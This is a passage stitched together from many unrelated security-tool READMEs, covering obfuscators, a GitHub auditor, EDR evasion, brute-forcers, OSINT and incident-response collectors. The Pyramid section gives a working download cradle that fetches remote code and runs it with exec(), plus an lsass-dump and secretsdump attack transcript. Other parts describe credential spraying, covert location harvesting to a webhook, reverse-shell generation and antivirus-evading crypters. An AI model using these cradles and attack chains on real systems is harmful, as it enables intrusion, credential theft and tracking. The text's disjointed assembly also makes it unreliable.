Open Codecepticon, wait until all NuGet packages are downloaded and then build the solution.
There are two ways to use Codecepticon: either by putting all arguments in the command line or by passing a single XML configuration file. Due to the high level of supported customisation, it's not recommended to manually go through the --help output to try and figure out which parameters to use and how. Use CommandLineGenerator.html and generate your command quickly:
The command generator's output format can be either Console
or XML
, depending what you prefer. Console commands can be executed as:
Codecepticon.exe --action obfuscate --module csharp --verbose ...etc
While when using an XML config file, as:
Codecepticon.exe --config C:\Your\Path\To\The\File.xml
If you want to deep dive into Codecepticon's functionality, check out this document.
For tips you can use, check out this document.
Obfuscating a C# project is simple: select the solution you wish to target. Note that no backup of the solution will be taken; the current copy is the one that will be obfuscated. Make sure that you can independently compile the target project before trying to run Codecepticon against it.
The VBA obfuscation works against the source code itself rather than a Microsoft Office document. This means that you cannot pass a doc(x) or xls(x) file to Codecepticon. It will have to be the source code of the module itself (press Alt-F11 and copy the code from there).
Due to the complexity of PowerShell scripts, along with the freedom they allow in how scripts are written, it is challenging to cover all edge cases and ensure that the obfuscated result will be fully functional. Although Codecepticon is expected to work fine against simple scripts/functionality, running it against complex ones such as PowerView will not work - this is a work in progress.
After obfuscating an application or a script, it is very likely that the command line arguments have also been renamed. The solution to this is to use the HTML mapping file to find what the new names are. For example, let's convert the following command line:
SharpHound.exe --CollectionMethods DCOnly --OutputDirectory C:\temp\
By searching through the HTML mapping file for each argument, we get:
And by replacing all strings the result is:
ObfuscatedSharpHound.exe --AphylesPiansAsp TurthsTance --AnineWondon C:\temp\
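This renaming step can be scripted. Below is a minimal sketch: the old/new names come from the example above, while the mapping dictionary itself would be extracted by hand from the HTML mapping file (that extraction is not shown and the helper name is illustrative):

```python
# Old-name -> new-name pairs looked up in Codecepticon's HTML mapping file.
mapping = {
    "SharpHound.exe": "ObfuscatedSharpHound.exe",
    "CollectionMethods": "AphylesPiansAsp",
    "DCOnly": "TurthsTance",
    "OutputDirectory": "AnineWondon",
}

def rewrite(cmdline: str, mapping: dict) -> str:
    """Replace every mapped token in the command line with its obfuscated name."""
    for old, new in mapping.items():
        cmdline = cmdline.replace(old, new)
    return cmdline

original = "SharpHound.exe --CollectionMethods DCOnly --OutputDirectory C:\\temp\\"
print(rewrite(original, mapping))
```

Because the same value can appear in more than one category of the mapping file, a blind string replacement like this can over-match, which is exactly why the result must always be tested locally first.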
However, some values may exist in more than one category:
Therefore it is critical to always test your result in a local environment first.
The compiled output includes a lot of dependency DLLs which, due to licensing requirements, we can't re-distribute without written consent.
No, Codecepticon should work with everything. The profiles are just a bit of extra tweaks that are done to the target project in order to make it more reliable and easier to work with.
But as all code is unique, there will be instances where obfuscating a project will end up with an error or two that won't allow it to be compiled or executed. In this case a new profile may be in order - please raise a new issue if this is the case.
Same principle applies to PowerShell/VBA code - although those currently have no profiles that come with Codecepticon, it's an easy task to add if some are needed.
For reporting bugs and suggesting new features, please create an issue.
For submitting pull requests, please see the Contributions section.
Before running Codecepticon make sure you can compile a clean version of the target project. Very often when this issue appears, it's due to missing dependencies for the target solution rather than Codecepticon. But if it still doesn't compile:
I will do my best, but as PowerShell scripts can be VERY complex and the PSParser isn't as advanced as Roslyn for C#, no promises can be made. Same applies for VBA/VB6.
You may at some point encounter the following error:
Still trying to get to the bottom of this one; a quick fix is to uninstall and reinstall the System.Collections.Immutable package from the NuGet Package Manager.
Whether it's a typo, a bug, or a new feature, Codecepticon is very open to contributions as long as we agree on the following:
Strengthen the security posture of your GitHub organization!
Detect and remediate misconfigurations, security and compliance issues across all your GitHub assets with ease
git clone git@github.com:Legit-Labs/legitify.git
go run main.go analyze ...
To enhance the software supply chain security of legitify's users, as of v0.1.6, every legitify release contains a SLSA Level 3 Provenance document.
The provenance document refers to all artifacts in the release, as well as the generated docker image.
You can use SLSA framework's official verifier to verify the provenance.
Example of usage for the darwin_arm64 architecture for the v0.1.6 release:
VERSION=0.1.6
ARCH=darwin_arm64
./slsa-verifier verify-artifact --source-branch main --builder-id 'https://github.com/slsa-framework/slsa-github-generator/.github/workflows/generator_generic_slsa3.yml@refs/tags/v1.2.2' --source-uri "git+https://github.com/Legit-Labs/legitify" --provenance-path multiple.intoto.jsonl ./legitify_${VERSION}_${ARCH}.tar.gz
legitify requires a GitHub personal access token (PAT) to analyze your resources. You can provide it either as a command-line argument (-t) or as an environment variable ($GITHUB_ENV). The PAT needs the following scopes for full analysis: admin:org, read:enterprise, admin:org_hook, read:org, repo, read:repo_hook
See Creating a Personal Access Token for more information.
Fine-grained personal access tokens are currently not supported because they do not support GitHub's GraphQL (https://github.blog/2022-10-18-introducing-fine-grained-personal-access-tokens-for-github/)
LEGITIFY_TOKEN=<your_token> legitify analyze
By default, legitify will check the policies against all your resources (organizations, repositories, members, actions).
You can control which resources will be analyzed with command-line flags namespace and org:
--namespace (-n): will analyze policies that relate to the specified resources
--org: will limit the analysis to the specified organizations
LEGITIFY_TOKEN=<your_token> legitify analyze --org org1,org2 --namespace organization,member
The above command will test organization and member policies against org1 and org2.
You can run legitify against a GitHub Enterprise instance if you set the endpoint URL in the environment variable SERVER_URL
:
export SERVER_URL="https://github.example.com/"
LEGITIFY_TOKEN=<your_token> legitify analyze --org org1,org2 --namespace organization,member
To run legitify against GitLab Cloud, set the scm flag to gitlab (--scm gitlab). To run against a GitLab Server instance, you also need to provide SERVER_URL:
export SERVER_URL="https://gitlab.example.com/"
LEGITIFY_TOKEN=<your_token> legitify analyze --namespace organization --scm gitlab
Namespaces in legitify are resources that are collected and run against the policies. Currently, the following namespaces are supported:
organization - organization-level policies (e.g., "Two-Factor Authentication Is Not Enforced for the Organization")
actions - organization GitHub Actions policies (e.g., "GitHub Actions Runs Are Not Limited To Verified Actions")
member - organization members policies (e.g., "Stale Admin Found")
repository - repository-level policies (e.g., "Code Review By At Least Two Reviewers Is Not Enforced")
runner_group - runner group policies (e.g., "runner can be used by public repositories")
By default, legitify will analyze all namespaces. You can limit the analysis to selected ones with the --namespace flag, followed by a comma-separated list of the selected namespaces.
By default, legitify will output the results in a human-readable format. This includes the list of policy violations listed by severity, as well as a summary table that is sorted by namespace.
Using the --output-format (-f) flag, legitify supports outputting the results in the following formats:
human-readable - Human-readable text (default).
json - Standard JSON.
Using the --output-scheme flag, legitify supports outputting the results in different grouping schemes. Note: --output-format=json must be specified to output non-default schemes.
flattened - No grouping; a flat listing of the policies, each with its violations (default).
group-by-namespace - Group the policies by their namespace.
group-by-resource - Group the policies by their resource, e.g. a specific organization/repository.
group-by-severity - Group the policies by their severity.
Other output options:
--output-file - full path of the output file (default: no output file, prints to stdout).
--error-file - full path of the error logs (default: ./error.log).
When outputting in a human-readable format, legitify supports the conventional --color[=when] flag, which has the following options:
flag, which has the following options:
auto - colored output if stdout is a terminal, uncolored otherwise (default).
always - colored output regardless of the output destination.
none - uncolored output regardless of the output destination.
Use the --failed-only flag to filter out passed/skipped checks from the result.
scorecard is an OSSF open-source project:
Scorecards is an automated tool that assesses a number of important heuristics ("checks") associated with software security and assigns each check a score of 0-10. You can use these scores to understand specific areas to improve in order to strengthen the security posture of your project. You can also assess the risks that dependencies introduce, and make informed decisions about accepting these risks, evaluating alternative solutions, or working with the maintainers to make improvements.
legitify supports running scorecard for all of the organization's repositories, enforcing score policies and showing the results using the --scorecard
flag:
no - do not run scorecard (default).
yes - run scorecard and employ a policy that alerts on each repo score below 7.0.
verbose - run scorecard, employ a policy that alerts on each repo score below 7.0, and embed its output in legitify's output.
legitify runs the following scorecard checks:
Check | Public Repository | Private Repository |
---|---|---|
Security-Policy | V | |
CII-Best-Practices | V | |
Fuzzing | V | |
License | V | |
Signed-Releases | V | |
Branch-Protection | V | V |
Code-Review | V | V |
Contributors | V | V |
Dangerous-Workflow | V | V |
Dependency-Update-Tool | V | V |
Maintained | V | V |
Pinned-Dependencies | V | V |
SAST | V | V |
Token-Permissions | V | V |
Vulnerabilities | V | V |
Webhooks | V | V |
legitify comes with a set of policies in the policies/github
directory. These policies are documented here.
In addition, you can use the --policies-path (-p)
flag to specify a custom directory for OPA policies.
Thank you for considering contributing to Legitify! We encourage and appreciate any kind of contribution. Here are some resources to help you get started:
Pyramid is a set of Python scripts and module dependencies that can be used to evade EDRs. The main purpose of the tool is to perform offensive tasks by leveraging some Python evasion properties while looking like legitimate Python application usage. This can be achieved because:
For more information please check the DEFCON30 - Adversary village talk "Python vs Modern Defenses" slide deck and this post on my blog.
This tool was created to demonstrate a bypass strategy against EDRs based on some blind-spot assumptions. It is a combination of already existing techniques and tools in a (to the best of my knowledge) novel way that can help evade defenses. The sole intent of the tool is to help the community increase awareness around this kind of usage and accelerate a resolution. It's not a 0day, and it's not a full-fledged shiny C2; Pyramid exploits what might be EDR blind spots, and the tool has been made public to shed some light on them. A defense paragraph has been included, hoping that experienced blue-teamers can help contribute and provide better possible resolutions to the issue Pyramid aims to highlight. All information is provided for educational purposes only. Follow instructions at your own risk. Neither the author nor his employer is responsible for any direct or consequential damage or loss arising from any person or organization.
Pyramid is using some awesome tools made by:
TrustedSec for COFFLoader
snovvcrash - base-DonPAPI.py - base-LaZagne.py - base-clr.py
Pyramid capabilities are executed directly from python.exe process and are currently:
Pyramid is meant to be used by unpacking an official embeddable Python package and then running python.exe to execute a Python download cradle. This is a simple way to avoid creating an uncommon process tree pattern while looking like normal Python application usage.
In Pyramid the download cradle is used to reach a Pyramid Server (simple HTTPS server with auth) to fetch base scripts and dependencies.
Base scripts are specific for the feature you want to use and contain:
BOFs are run through a base script containing the shellcode produced by bof2shellcode and the related in-process injection code.
The Python dependencies have been already fixed and modified to be imported in memory without conflicting.
There are currently 8 main base scripts available:
git clone https://github.com/naksyn/Pyramid
Generate SSL certificates for HTTP Server:
openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365
Example of running Pyramid HTTP Server using SSL certificate and by providing Basic Authentication:
python3 PyramidHTTP.py 443 testuser Sup3rP4ss! /home/user/SSL/key.pem /home/user/SSL/cert.pem /home/user/Pyramid/Server/
Insert AD details and HTTPS credentials in the upper part of the script.
Insert AD details and HTTPS credentials in the upper part of the script.
The nanodump BOF has been modified stripping Beacon API calls, cmd line parsing and hardcoding input arguments in order to use the process forking technique and outputting lsass dump to C:\Users\Public\video.avi. To change these settings modify nanodump source file entry.c accordingly and recompile the BOF. Then use the tool bof2shellcode giving as input the compiled nanodump BOF:
python3 bof2shellcode.py -i /home/user/bofs/nanodump.x64.o -o nanodump.x64.bin
You can transform the resulting shellcode to python format using msfvenom:
msfvenom -p generic/custom PAYLOADFILE=nanodump.x64.bin -f python > sc_nanodump.txt
Then paste it into the base script within the shellcode variable.
Insert SSH server, local port forward details details and HTTPS credentials in the upper part of the script and modify the sc variable using your preferred shellcode stager. Remember to tunnel your traffic using SSH local port forward, so the stager should have 127.0.0.1 as C2 server and the SSH listening port as the C2 port.
Insert AD details and HTTPS credentials in the upper part of the script.
Insert HTTPS credentials in the upper part of the script and change lazagne module if needed.
Insert HTTPS credentials in the upper part of the script and assembly bytes of the file you want to load.
Insert parameters in the upper part of the script.
Once the Pyramid server is running and the Base script is ready you can execute the download cradle from python.exe. A Python download cradle can be as simple as:
import urllib.request
import base64
import ssl
# Self-signed certificate on the Pyramid server: disable hostname checking
# and certificate verification for this request.
gcontext = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
gcontext.check_hostname = False
gcontext.verify_mode = ssl.CERT_NONE
# Request the base script, authenticating with HTTP Basic Auth.
request = urllib.request.Request('https://myIP/base-bof.py')
base64string = base64.b64encode(bytes('%s:%s' % ('testuser', 'Sup3rP4ss!'),'ascii'))
request.add_header("Authorization", "Basic %s" % base64string.decode('utf-8'))
result = urllib.request.urlopen(request, context=gcontext)
# Execute the downloaded base script inside the current python.exe process.
payload = result.read()
exec(payload)
Bear in mind that urllib is a native Python module in the Embeddable Package, so you don't need to install additional dependencies for this cradle. The downloaded Python "base" script will in-memory import the dependencies and execute its capabilities within the python.exe process.
To execute Pyramid without bringing up a visible python.exe prompt, you can leverage pythonw.exe, which won't open a console window upon execution and is contained in the very same Windows Embeddable Package. The following picture illustrates an example usage of pythonw.exe to execute base-tunnel-socks5.py on a remote machine without opening a python.exe console window.
The attack transcript is reported below:
Start Pyramid Server:
python3 PyramidHTTP.py 443 testuser Sup3rP4ss! /home/nak/projects/dev/Proxy/Pyramid/key.pem /home/nak/projects/dev/Proxy/Pyramid/cert.pem /home/nak/projects/dev/Proxy/Pyramid/Server/
Save the base download cradle to cradle.py.
Copy unpacked windows Embeddable Package (with cradle.py) to target:
smbclient //192.168.1.11/C$ -U domain/user -c 'prompt OFF; recurse ON; lcd /home/user/Downloads/python-3.10.4-embed-amd64; cd Users\Public; mkdir python-3.10.4-embed-amd64; cd python-3.10.4-embed-amd64; mput *'
Execute pythonw.exe to launch the cradle:
/usr/share/doc/python3-impacket/examples/wmiexec.py domain/user:"Password1\!"@192.168.1.11 'C:\Users\Public\python-3.10.4-embed-amd64\pythonw.exe C:\Users\Public\python-3.10.4-embed-amd64\cradle.py'
Socks5 server is running on target and SSH tunnel should be up, so modify proxychains.conf and tunnel traffic through target:
proxychains impacket-secretsdump domain/user:"Password1\!"@192.168.1.50 -just-dc
Dynamically loading Python modules does not natively support importing *.pyd files, which are essentially DLLs. The only public solution to my knowledge that solves this problem is provided by Scythe (in-memory-execution) by re-engineering the CPython interpreter. In order not to lose the digital signature, one solution that allows using the native Python embeddable package involves dropping the required pyd files or wheels on disk. This should not have significant OPSEC implications in most cases; however, bear in mind that the following wheels containing pyd files are dropped on disk to allow dynamic loading to complete:
Cryptodome - needed by Bloodhound-Python, Impacket, DonPAPI and LaZagne
bcrypt, cryptography, nacl, cffi - needed by paramiko
Python.exe is a signed binary with good reputation and does not provide visibility on Python dynamic code. Pyramid exploits these evasion properties carrying out offensive tasks from within the same python.exe process.
For this reason, one of the most efficient solution would be to block by default binaries and dlls signed by Python Foundation, creating exceptions only for users that actually need to use python binaries.
Alerts on downloads of embeddable packages can also be raised.
Deploying PEP-578 is also feasible although complex, this is a sample implementation. However, deploying PEP-578 without blocking the usage of stock python binaries could make this countermeasure useless.
AzureGraph is an Azure AD information gathering tool over Microsoft Graph.
Thanks to Microsoft Graph technology, it is possible to obtain all kinds of information from Azure AD, such as users, devices, applications, domains and much more.
This application allows you to query this data through the API in an easy and simple way from a PowerShell console. Additionally, you can download all the information from the cloud and use it completely offline.
It's recommended to clone the complete repository or download the zip file.
You can do this by running the following command:
git clone https://github.com/JoelGMSec/AzureGraph
.\AzureGraph.ps1 -h
_ ____ _
/ \ _____ _ _ __ ___ / ___|_ __ __ _ _ __ | |__
/ _ \ |_ / | | | '__/ _ \ | _| '__/ _' | '_ \| '_ \
/ ___ \ / /| |_| | | | __/ |_| | | | (_| | |_) | | | |
/_/ \_\/___|\__,_|_| \___|\____|_| \__,_| .__/|_| |_|
|_|
-------------------- by @JoelGMSec --------------------
Info: This tool helps you to obtain information from Azure AD
like Users or Devices, using the Microsoft Graph REST API
Usage: .\AzureGraph.ps1 -h
Show this help, more info on my blog: darkbyte.net
.\AzureGraph.ps1
Execute AzureGraph in fully interactive mode
Warning: You need previously generated MS Graph token to use it
You can use a refresh token too, or generate a new one
https://darkbyte.net/azuregraph-enumerando-azure-ad-desde-microsoft-graph
This project is licensed under the GNU 3.0 license - see the LICENSE file for more details.
This tool has been created and designed from scratch by Joel Gรกmez Molina // @JoelGMSec
This software does not offer any kind of guarantee. Its use is exclusive for educational environments and / or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.
For more information, you can find me on Twitter as @JoelGMSec and on my blog darkbyte.net.
The tool hosts a fake website which uses an iframe to display a legit website and, if the target allows it, it will fetch the GPS location (latitude and longitude) of the target along with the IP address and device information.
Using this tool, you can find out what information a malicious website can gather about you and your devices and why you shouldn't click on random links or grant permissions like Location to them.
+ It will automatically fetch the IP address and device information.
! If location permission is allowed, it will fetch the exact location of the target.
- It will not work on laptops or phones that have broken GPS,
# browsers that block javascript,
# or if the user is mocking the GPS location.
- Geographic location based on IP address is NOT accurate,
# Does not provide the location of the target.
# Instead, it provides the approximate location of the ISP (Internet service provider)
+ GPS fetch almost exact location because it uses longitude and latitude coordinates.
@@ Once location permission is granted @@
# accurate location information is received to within 20 to 30 meters of the user's location.
# (it's almost exact location)
git clone https://github.com/spyboy-productions/r4ven.git
cd r4ven
pip3 install -r requirements.txt
python3 r4ven.py
enter your discord webhook url (set up a channel in your discord server with webhook integration)
https://support.discord.com/hc/en-us/articles/228383668-Intro-to-Webhooks
If you don't have a Discord account and server, make one; it's free.
To change the displayed site, edit index.html on line 12 and replace the src in the iframe. (Note: not every website supports iframes.)
With this application, the aim is to accelerate incident response processes by collecting information on Linux operating systems.
The following information is collected:
/etc/passwd
cat /etc/group
cat /etc/sudoers
lastlog
cat /var/log/auth.log
uptime
/proc/meminfo
ps aux
/etc/resolv.conf
/etc/hosts
iptables -L -v -n
find / -type f -size +512k -exec ls -lh {} \;
find / -mtime -1 -ls
ip a
netstat -nap
arp -a
echo $PATH
git clone https://github.com/anil-yelken/pylirt
cd pylirt
sudo pip3 install paramiko
The following information should be specified in the cred_list.txt file:
IP|Username|Password
sudo python3 plirt.py
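The cred_list.txt lines above are pipe-delimited and can be split in a couple of lines. A minimal sketch (the file format comes from the README; the helper itself is illustrative, not pylirt's actual code):

```python
def parse_cred_line(line: str):
    """Split an 'IP|Username|Password' line into its three fields.
    maxsplit=2 keeps any '|' characters inside the password intact."""
    ip, user, password = line.strip().split("|", 2)
    return ip, user, password

# One target per line, as described above.
print(parse_cred_line("192.168.1.11|administrator|Password1!"))
```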
https://twitter.com/anilyelken06
https://medium.com/@anilyelken
The Klyda project has been created to aid in quick credential based attacks against online web applications.
Klyda supports everything from simple password sprays to large multithreaded dictionary attacks.
Klyda is a new project, and I am looking for any contributions. Any help is very appreciated.
Klyda offers simple, easy-to-remember usage, while still offering configurability for your needs:
1) Clone the Git repo to your machine, git clone https://github.com/Xeonrx/Klyda
2) Cd into the Klyda directory, cd Klyda
3) Install the necessary modules via Pip, pip install requests beautifulsoup4 colorama numpy
4) Display the Klyda help prompt for usage, python3 klyda.py -h
Klyda has been mainly designed for Linux, but should work on any machine capable of running Python.
Klyda needs only four simple inputs to work: the URL to attack, username(s), password(s), and form data.
You can pass the URL via the --url tag. It should look something like this: --url http://127.0.0.1
Remember: never launch an attack against a webpage you don't have proper permission to test.
Usernames are the main target to these dictionary attacks. It could be a whole range of usernames, a few in specific, or perhaps just one. That's all your decision when using the script. You can specify usernames in a few ways...
1) Specify them manually, -u Admin User123 Guest
2) Give a file to use, or a few to combine, -U users.txt extra.txt
3) Give both a file & manual entry, -U users.txt -u Johnson924
Passwords are the hard part to these attacks. You don't know them, hence why dictionary & brute force attacks exists. Like the usernames, you can give from just one password, up to however many you want. You can specify passwords in a few ways...
1) Specify them manually, -p password 1234 letmein
2) Give a file to use, or a few to combine, -P passwords.txt extra.txt
3) Give both a file & manual entry, -P passwords.txt -p redklyda24
FormData is how you form the request so the target website can take it in and process the given information. Usually you would need to specify a username value, a password value, and sometimes an extra value. You can see the FormData your target uses by reviewing the network tab of your browser's inspect element. For Klyda, you use the -d tag.
You need to use placeholders so Klyda knows where to inject the username & password when forwarding out its requests. It may look something like this... -d username:xuser password:xpass Login:Login
xuser is the placeholder to inject the usernames, & xpass is the placeholder to inject the passwords. Make sure you know these, or Klyda won't be able to work.
Format the FormData as (key):(value)
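The placeholder substitution described above can be sketched in a few lines of Python. This is not Klyda's internal code, just the documented behaviour of the -d tag and its xuser/xpass placeholders:

```python
def build_formdata(pairs, username, password, user_ph="xuser", pass_ph="xpass"):
    """Turn 'key:value' strings into a request dict, swapping the
    placeholder values for the credentials currently being tried."""
    data = {}
    for pair in pairs:
        key, value = pair.split(":", 1)  # split only on the first ':'
        if value == user_ph:
            value = username
        elif value == pass_ph:
            value = password
        data[key] = value
    return data

# Mirrors: -d username:xuser password:xpass Login:Login
print(build_formdata(["username:xuser", "password:xpass", "Login:Login"],
                     "admin", "letmein"))
```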
In order for Klyda to know if it hit a successful strike or not, you need to give it data to dig through. Klyda makes use of given blacklists from failed login attempts, so it can tell the difference between a failed and a successful request. You can blacklist three different types of data...
1) Strings, --bstr "Login failed"
2) Status Codes, --bcde 404
3) Content Length, --blen 11
You can specify as much data for each blacklist as needed. If none of the given data is found in the response, Klyda gives it a "strike", marking it as a successful login attempt. Otherwise, if data from the blacklists is found, Klyda marks it as an unsuccessful login attempt. Since you give the data for Klyda to evaluate, false positives are rare.
If you don't give any data to blacklist, then every request will be marked as a strike from Klyda!
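The strike decision described above boils down to one rule: a response is a strike only if nothing from any blacklist appears in it. A sketch of that rule (illustrative, not Klyda's actual implementation):

```python
def is_strike(body: str, status: int, length: int, bstr=(), bcde=(), blen=()):
    """Return True (a 'strike', i.e. possible valid login) only if NONE of
    the blacklisted strings, status codes, or content lengths match."""
    if any(s in body for s in bstr):   # --bstr: blacklisted response strings
        return False
    if status in bcde:                  # --bcde: blacklisted status codes
        return False
    if length in blen:                  # --blen: blacklisted content lengths
        return False
    return True

# Failed-login page contains the blacklisted string -> not a strike
print(is_strike("Login failed", 200, 11, bstr=["Login failed"]))
# Nothing blacklisted matched -> strike
print(is_strike("Welcome back!", 302, 540, bstr=["Login failed"]))
```

Note that with empty blacklists every response is a strike, which is exactly the warning above.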
By default, Klyda only uses a single thread to run, but you can specify more using the -t tag. This can be helpful for speeding up your work.
However, credential attacks can be very loud on a network and hence are detected easily. A targeted account could simply receive a lock due to too many login attempts. This creates a DoS, but prevents you from gaining the user's credentials, which is the goal of Klyda.
So to make these attacks a little less loud, you can make use of the --rate tag. This allows you to limit your threads to a certain number of requests per minute. It is formatted like this: --rate (# of requests) (minutes)
For example, --rate 5 1 will only send out 5 requests each minute. Remember, this is per thread: if you had 2 threads, this would send 10 requests per minute.
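The per-thread pacing implied by --rate is simple arithmetic; a sketch (hypothetical helper, not Klyda's code):

```python
def delay_between_requests(requests_per_window: int, minutes: float) -> float:
    """Seconds a single thread should sleep between requests so that it
    sends `requests_per_window` requests every `minutes` minutes."""
    return (minutes * 60.0) / requests_per_window

print(delay_between_requests(5, 1))  # --rate 5 1 -> one request every 12.0 s
```

With 2 threads each sleeping 12 s between requests, the total is 10 requests per minute, matching the example above.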
Test Klyda out on the Damn Vulnerable Web App (DVWA), or Mutillidae.
python3 klyda.py --url http://127.0.0.1/dvwa/login.php -u user guest admin -p 1234 password admin -d username:xuser password:xpass Login:Login --bstr "Login failed"
python3 klyda.py --url http://127.0.0.1/mutillidae/index.php?page=login.php -u root -P passwords.txt -d username:xuser password:xpass login-php-submit-button:Login --bstr "Authentication Error"
Like mentioned earlier, Klyda is still a work in progress. For the future, I plan on adding more functionality and reformating code for a cleaner look.
My top piority is to add proxy functionality, and am currently working on it.
scscanner is a tool to read website status code responses from a list of domains. The tool can filter for a specific status code and save the results to a file.
┌──(miku㉿nakano)-[~/scscanner]
└─$ bash scscanner.sh
scscanner - Massive Status Code Scanner
Codename : EVA02
Example: bash scscanner.sh -l domain.txt -t 30
options:
-l Files contain lists of domain.
-t Adjust multi process. Default is 15
-f Filter status code.
-o Save to file.
-h Print this Help.
Adjust multi-process
bash scscanner.sh -l domain.txt -t 30
Using status code filter
bash scscanner.sh -l domain.txt -f 200
Using status code filter and save to file.
bash scscanner.sh -l domain.txt -f 200 -o result.txt
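scscanner itself is a bash script, but the idea behind the -f filter can be illustrated in a few lines of Python (the helper and data below are hypothetical, for illustration only):

```python
def filter_by_status(results, wanted=None):
    """Keep only (domain, status) pairs matching the filter;
    with no filter, keep everything (like running without -f)."""
    if wanted is None:
        return list(results)
    return [(domain, status) for domain, status in results if status == wanted]

scan = [("a.example.com", 200), ("b.example.com", 404), ("c.example.com", 200)]
print(filter_by_status(scan, 200))  # only the 200 responses
```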
Feel free to contribute if you want to improve this tool.
Neton is a tool for getting information from Internet-connected sandboxes. It is composed of an agent and a web interface that displays the collected information.
The Neton agent gets information from the systems on which it runs and exfiltrates it via HTTPS to the web server.
Some of the information it collects:
All this information can be used to improve Red Team artifacts or to learn how sandboxes work and improve them.
python3 -m venv venv
source venv/bin/activate
pip3 install -r requirements.txt
python3 manage.py migrate
python3 manage.py makemigrations core
python3 manage.py migrate core
python3 manage.py createsuperuser
python3 manage.py runserver
openssl req -newkey rsa:2048 -new -nodes -x509 -days 3650 -keyout server.key -out server.crt
Launch gunicorn:
./launch_prod.sh
Build the solution with Visual Studio. The agent can be configured from the Program.cs class.
In the sample data folder there is a sqlite database with several samples collected from the following services:
To access the sample information copy the sqlite file to the NetonWeb folder and run the application.
Credentials:
raccoon
jAmb.Abj3.j11pmMa
A script for generating common revshells fast and easy.
Especially nice when in need of PowerShell and Python revshells, which can be a PITA to get correctly formatted.
curl -F path="absolute path for Updog-folder" -F file=filename http://UpdogIP/upload
git clone https://github.com/4ndr34z/shells
cd shells
./install.sh
With this application, the aim is to accelerate incident response processes by collecting information on Windows operating systems via WinRM.
The following information is collected:
IP Configuration
Users
Groups
Tasks
Services
Task Scheduler
Registry Control
Active TCP & UDP ports
File sharing
Files
Firewall Config
Sessions with other Systems
Open Sessions
Log Entries
git clone https://github.com/anil-yelken/pywirt
cd pywirt
pip3 install pywinrm
The following information should be specified in the cred_list.txt file:
IP|Username|Password
https://twitter.com/anilyelken06
https://medium.com/@anilyelken
Abusing SecurityTrails domain suggestion API to find potentially related domains by keyword and brute force.
Use it while it still works
(Also, hmu on Mastodon: @n0kovo@infosec.exchange)
usage: domaindouche.py [-h] [-n N] -c COOKIE -a USER_AGENT [-w NUM] [-o OUTFILE] keyword
Abuses SecurityTrails API to find related domains by keyword.
Go to https://securitytrails.com/dns-trails, solve any CAPTCHA you might encounter,
copy the raw value of your Cookie and User-Agent headers and use them with the -c and -a arguments.
positional arguments:
keyword keyword to append brute force string to
options:
-h, --help show this help message and exit
-n N, --num N number of characters to brute force (default: 2)
-c COOKIE, --cookie COOKIE
raw cookie string
-a USER_AGENT, --useragent USER_AGENT
user-agent string (must match the browser where the cookies are from)
-w NUM, --workers NUM
number of workers (default: 5)
-o OUTFILE, --output OUTFILE
output file path
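The -n option above implies generating every suffix of N characters and appending it to the keyword before querying the API. A sketch of that candidate generation (the exact alphabet domaindouche uses is an assumption here):

```python
import itertools
import string

def candidates(keyword: str, num: int):
    """Yield the keyword plus every suffix of `num` lowercase-alphanumeric
    characters -- the brute-force space implied by the -n option."""
    alphabet = string.ascii_lowercase + string.digits
    for combo in itertools.product(alphabet, repeat=num):
        yield keyword + "".join(combo)

# num=1 over a 36-char alphabet yields 36 candidates: acmea ... acme9
print(next(candidates("acme", 1)))  # 'acmea'
```

With the default of num=2 this grows to 36^2 = 1296 candidates per keyword, which is why the worker count (-w) matters.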
D4TA-HUNTER is a tool created in order to automate the collection of information about the employees of a company that is going to be audited for ethical hacking.
In addition, the "search company" section lets you insert a company's domain and find employee emails, subdomains, and server IPs.
Register on https://rapidapi.com/rohan-patra/api/breachdirectory
git clone https://github.com/micro-joan/D4TA-HUNTER
cd D4TA-HUNTER/
chmod +x run.sh
./run.sh
After executing the application launcher, it checks one by one that all required components are installed; for any component that is missing, it shows you the command you must run to install it:
First you must have a free or paid API key from BreachDirectory.org; if you don't have one and perform a search, D4TA-HUNTER provides a guide on how to get one.
Once you have the API key you will be able to search for emails, with the advantage of a list of all the password hashes ready for you to copy and paste into one of the online resources provided by D4TA-HUNTER to crack passwords 100% free.
You can also insert a domain of a company and D4TA-HUNTER will search for employee emails, subdomains that may be of interest together with IP's of machines found:
Service | Functions | Status |
---|---|---|
BreachDirectory.org | Email, phone or nick leaks | ✅ (free plan) |
TheHarvester | Domains and emails of company | ✅ Free |
Kalitorify | Tor search | ✅ Free |
Video Demo: https://darkhacking.es/d4ta-hunter-framework-osint-para-kali-linux
My website: https://microjoan.com
My blog: https://darkhacking.es/
Buy me a coffee: https://www.buymeacoffee.com/microjoan
This toolkit contains materials that can be potentially damaging or dangerous for social media. Refer to the laws in your province/country before accessing, using, or in any other way utilizing it in a wrong way.
This tool is made for educational purposes only. Do not attempt to violate the law with anything contained here. If that is your intention, then get the hell out of here!
Python-based crypter that can bypass many kinds of antivirus products.
*:- For Windows: https://www.python.org/ftp/python/3.10.7/python-3.10.7-amd64.exe
*:- For Linux:
*:- For Windows:-
*:- For Linux:-
Use this tool for educational purposes only; I will not be responsible for your cruel acts.
A standalone python3 remake of the classic "tree" command with the additional feature of searching for user provided keywords/regex in files, highlighting those that contain matches. Created for two main reasons:
Example #1: Running a regex that essentially matches strings similar to "password = something" against /var/www
Example #2: Using comma separated keywords instead of regex:
Disclaimer: Only tested on Windows 10 Pro.

Notable features:
- The -x search actually returns a unique list of all matched patterns in a file. Be careful when combining it with -v (--verbose); try to be specific and limit the length of chars to match.
- -b
- Both keyword -k and regex -x values can be used. This is useful in case you have gained a limited shell on a machine and want to have "tree" with colored output to look around.
- A filetype_blacklist variable in eviltree.py can be used to exclude certain file extensions from content search. By default, it excludes the following: gz, zip, tar, rar, 7z, bz2, xz, deb, img, iso, vmdk, dll, ovf, ova.
- The -i (--interesting-only) option instructs eviltree to list only files with matching keywords/regex content, significantly reducing the output length.

Example regex: -x ".{0,3}passw.{0,3}[=]{1}.{0,18}"
Example keywords: -k passw,db_,admin,account,user,token
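The content search in the two examples above can be approximated in a few lines of Python (a rough sketch of the technique; eviltree's real implementation differs in features and output):

```python
import re
from pathlib import Path

# Mirrors the default filetype_blacklist documented above
FILETYPE_BLACKLIST = {"gz", "zip", "tar", "rar", "7z", "bz2", "xz", "deb",
                      "img", "iso", "vmdk", "dll", "ovf", "ova"}

def search_tree(root, pattern):
    """Yield (path, unique matches) for each file whose content matches the regex."""
    rx = re.compile(pattern)
    for path in Path(root).rglob("*"):
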